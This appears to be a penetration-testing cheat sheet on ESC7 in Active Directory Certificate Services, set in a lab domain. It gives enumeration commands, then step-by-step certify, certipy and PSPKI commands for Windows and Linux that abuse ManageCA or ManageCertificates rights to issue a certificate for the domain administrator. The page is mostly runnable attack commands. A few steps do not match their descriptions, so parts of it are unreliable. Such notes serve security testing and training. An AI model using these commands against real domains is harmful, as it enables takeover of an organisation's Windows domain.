ESC7
Vulnerable Certificate Authority Access Control
where 2 sets of permissions poses security risks:
- ManageCA (or
ManageCertificates
) - ManageCertificates (or
Certificate Manager
)
Enumerate using certsrv.msc
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-CertificationAuthorityAcl | select -expand Access
Query CA with certutil (EditFlags
value)
Check if EDITF_ATTRIBUTESUBJECTALTNAME2
is set if the value is 1376590
.
PS /home/bobbuilder> certutil.exe -config "LAB-DC.minions.com\CA-minions" -getreg "policy\EditFlags"
Enumerate using PSPKI
module
PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.minions.com | Get-CertificationAuthorityAcl | select -ExpandProperty access
Windows
Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2
)
Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI by toggling the EDITF_ATTRIBUTESUBJECTALTNAME2
flag (just like with ESC6). This allows SAN specification in any template. The ESC6 attack got patch on May of 2022, so Attack #2 might be a better alternative if it's the case.
Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA
users have but they can't do it remotely.
- Request Certificate Template
PS /home/bobbuilder> .\certify.exe request /ca:<ca_name> /template:ApprovalNeeded
- Import
PSPKI
module
PS /home/bobbuilder> Import-Module PSPKI
- Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest
- Download Pending Request
PS /home/bobbuilder> .\certify.exe download /ca:<ca_name> /id:1
Post Attack
Disable EDITF_ATTRIBUTESUBJECTALTNAME2
with PowerShell
PS /home/bobbuilder> $ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
PS /home/bobbuilder> $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
Attack 2 (gain ManageCertificates
right using ManageCA
)
For this attack we only need ManageCA
permission. We will need Manage Certificates
permission and SubCA
Certificate template enabled but they both can be enabled from ManageCA
- Grant
Manage Certificates
access (Optional, if we don't already)
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -add-officer user1 -username user1@minions.com -password password1
- Enable
SubCA
Certificate template (Optional, The SubCA template is enabled by default)
PS /home/bobbuilder> .\certipy.exe ca -username user1@minions.com -password password1 -target-ip <ip> -ca '<ca_name>' -enable-template 'SubCA'
- Request certificate based on the
SubCA
template
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template SubCA -upn administrator@minions.com
- Issue the failed certificate
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -issue-request 1 -username user1@minions.com -password password1
- Retrieve the issued certificate
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -retrieve 1
Linux
Attack 1 (ManageCA
rights)
- Add Manage Certificates Access rights to BlWasp
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -add-officer user1
- Requesting a certificate with SAN (
Enrollee Supplies Subject : True
)
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template SubCA -upn Administrator
- Issue the certificate
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 1
- Retrieve the certificate with the ID to authenticate using it
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 1
Attack 2 (ManageCertificates
rights)
- Request a certificate with the manager's approval
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template <template> -upn Administrator
- Approve pending request
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 1
- Retrieve approved request
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 1